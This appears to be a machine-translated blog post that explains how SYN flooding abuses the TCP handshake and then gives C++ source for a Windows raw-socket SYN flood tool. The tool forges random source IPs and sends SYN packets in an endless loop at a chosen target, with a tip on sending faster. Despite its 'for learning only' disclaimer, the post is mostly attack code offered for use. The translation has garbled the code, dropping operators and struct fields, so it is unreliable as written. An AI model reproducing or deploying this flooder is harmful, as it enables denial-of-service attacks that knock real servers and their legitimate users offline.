xiaoxiao2021-03-06  139

Simple analysis and implementation of SYN_FLOOD

Writeby: liond8



This procedure has a certain attack, please only use it for learning, do not endanger the network of the motherland. If you start attacking all consequences, I am not responsible.

There are a variety of attacks on the Internet to send packets (such as ICMP_FLOOD, Debris attack, etc.) which is the use of TCP protocols three handshakes (SYN_FLOOD). Let's take a look at the three handshakes of TCP.

There are now A, B two machines, where B is Server.a is Client.

First A send a data reported with the SYN tag (with start sequence number) to B.

Then B receive, and then send an ACK SYN (the active number of the B-machine start sequence number and A) to A.

Final A will then send a data report for serial number and confirmation number to B.

The connection is completed at this time.

Using this principle, if the A machine is sent a large number of machines that do not exist in the first step, then B is sent to b, then B will be connected to a lot of legal machine requests, and then check one by one. Then wait for the third confirmation establishment connection. Then a large number of waiting for the connection is retained in the stack. The general server waits for 2 minutes, and the connection request will be removed from the stack waiting for the connection. If SYN is sent fast enough, the legal user can not connect, the server will also spend a lot of resources to maintain the stack. Thereby, it is also a D.O.s attack.

Through Raw_Socket, as long as you are an administrator, you can fake the IP and TCP headers, and the SYN request for false source addresses.


Simple implementation is as follows:

/ * Flood.cpp * /







#pragma comment (Lib, "WS2_32.LIB")

#define max_receivebyte 255

Typedef struct ip_head // Defines IP headers


Unsigned char h_verlen; // 4 top length, 4-digit IP version number

Unsigned char TOS; // 8 service type TOS

Unsigned short total_len; // 16-bit total length (bytes)

UNSIGNED short ident; // 16 bit identity

Unsigned short frame_and_flags; // 3 bits (such as SYN, ACK, etc.)

Unsigned char TTL; // 8-bit survival time TTL

UNSIGNED Char proto; // 8-bit protocol (such as ICMP, TCP, etc.)

Unsigned short checksum; // 16-bit IP header checksum unsigned int sourceip; // 32 bitsource IP address

UNSIGNED INT Destip; // 32 bit IP address

} Ipheader;

Typedef struct tcp_head // Defines TCP header


Ushort th_sport; // 16 bond source port

USHORT TH_DPORT; / / 16-bit destination port

Unsigned int th_seq; // 32-bit serial number

UNSIGNED INT TH_ACK; / / 32 bit confirmation number

Unsigned char th_lenres; // 4 head length / 6 reserved words

Unsigned char th_flag; // 6 bit flag

Ushort TH_WIN; / / 16-bit window size

USHORT TH_SUM; / / 16-bit checksum

Ushort TH_URP; // 16-bit emergency data offset




Unsigned long saddr; // source address

Unsigned long daddr; // destination address


CHAR PTCL; // Protocol Type

Unsigned short tcpl; // TCP length

} PSDHeader;

// Checksum: Computing the subunies of the checksum

Ushort Checksum (Ushort * Buffer, int size)


Unsigned long cksum = 0;

While (size> 1)


CKSUM = * Buffer ;

Size - = SizeOf (Ushort);




CKSUM = * (Uchar *) BUFFER;


CKSUM = (CKSUM >> 16) (CKSUM & 0xFFF);

CKSUM = (CKSUM >> 16);

Return (Ushort) (~ CKSUM);


Void usage ()


PRINTF ("***************************************************** ************ ");


Printf ("Useage: flood target_ip target_port delay_time");

PRINTF ("***************************************************** ************ ");


// delay_time unit is milliseconds.

Int main (int Argc, char * argv [])


Wsadata wsadata;

Socket sock;

SockAddr_in addr_in;

Ipheader ipheader;


PSDHeader PSDHead;

Int Sourceport;

Char szsendbuf [60] = {0};

Bool flag;

Int Rect, NTimeover;

Int Sleeptime;


IF (Argc <3 || Argc> 4)

{Printf ("INPUT ERROR!");

Return false;}

IF (argc == 4) Sleeptime = ATOI (Argv [3]);

Else Sleeptime = 300;

IF (WSAStartup (MakeWord (2, 2), & WSADATA)! = 0) {

Printf ("WSAStartup Error!");

Return False;


Sock = NULL;

IF ((Sock = Socket (AF_INET, SOCK_RAW, IPPROTO_IP) == Invalid_socket


Printf ("Socket Setup Error!");

Return False;


Flag = true;

IF (setsockopt (sock, ipproto_ip, ip_hdrincl, (char *) & flag, sizeof (flash) == Socket_ERROR)


Printf ("setsockopt ip_hdrincl!");

Return False;



IF (SetsockOpt, SO_SNDTIMEO, (CHAR *) & ntimeover, sizeof (ntimeover) == Socket_ERROR) // Settings the time


Printf ("SetsockOpt SO_SNDTIMEO ERROR!");

Return False;


Addr_in.sin_family = af_INet;

Addr_in.sin_port = htons (ATOI (ARGV [2]));

Addr_in.sin_addr.s_un.s_addr = inet_addr (Argv [1]);

While (True)


// Fill the IP head

Ipheader.h_verlen = (4 << 4 | sizeof (iPheter) / sizeof (unsigned long);

Ipheader.tos = 0;

Ipheader.total_len = htons (ipheader) sizeof (TCPHEADER)); // IP total length

ipHeader.Ident = 1;

ipheader.frag_and_flags = 0; // No slide

Ipheader.ttl = (unsigned char) gettickcount ()% 87 123;

ipHeader.Proto = ipproto_tcp; // Protocol type TCP

ipHeader.checksum = 0; // The value of the test is initially 0

Ipheader.sourceip = HTONL (GettickCount () * 474695); // Randomly generate a forged IP

ipHeader.Destip = inet_addr (argv [1]); // Target IP

// Pack TCP header

Sourceport = gettickcount () * 43557% 9898; // randomly generated a port number

TCPHEADER.TH_DPORT = HTONS (ATOI (ARGV [2])); // Sending destination port

TCPHEADER.TH_SPORT = HTONS (Sourceport); // Source port number

TCPHEADER.TH_SEQ = HTONL (0x12345678); // serial number

TCPHEADER.TH_ACK = 0; // confirmation number


TCPHEADER.TH_FLAG = 2; / / Request for SYN




// Fill the TCP pseudo head for calculating the TCP header's papers and psdheader.saddr = ipHeader.SourceIP;

PSDHeader.daddr = ipheader.destip;

PSDHeader.mbz = 0;

PSDHeader.ptcl = ipproto_tcp;

PSDHeader.tcpl = htons (sizeof (tcpHeader));

// calculate the checksum

Memcpy (Szsendbuf, & Psdheader, Sizeof (psdheader));

Memcpy (Szsendbuf Sizeof (Psdheader), & Tcpheader, Sizeof (TCPHEADER);

TCPHEADER.TH_SUM = Checksum ((Ushort *) SzsendBuf, SizeOf (PSDHeader) Sizeof (TCPHEADER));

// put the forged IP head and TCP head into BUF ready to send

Memcpy (SzsendBuf, & ipheader, sizeof (ipheader);

Memcpy (szsendbuf sizeof (ipheader), & tcpheader, sizeof (tcpheader);

// Send a packet

Rect = Sendto (Sock, SzsendBuf, SizeOf (Ipheader) SizeOf (TCPHEADER), 0, (Struct SockAddr *) & addr_in, sizeof (addr_in));

IF (Rect == Socket_ERROR)


Printf ("Send Error!:% X", Wsagetlasterror ());

Return False;



Printf ("Send OK!");

Sleep (SleepTime); // Determine this value according to your network speed, the smaller the SleepTime, the faster you get

} // endwhile // Re-falsify the source address of IP again to send the target

CloseSocket (SOCK);


Return 0;


Compiled by VC 6.0.


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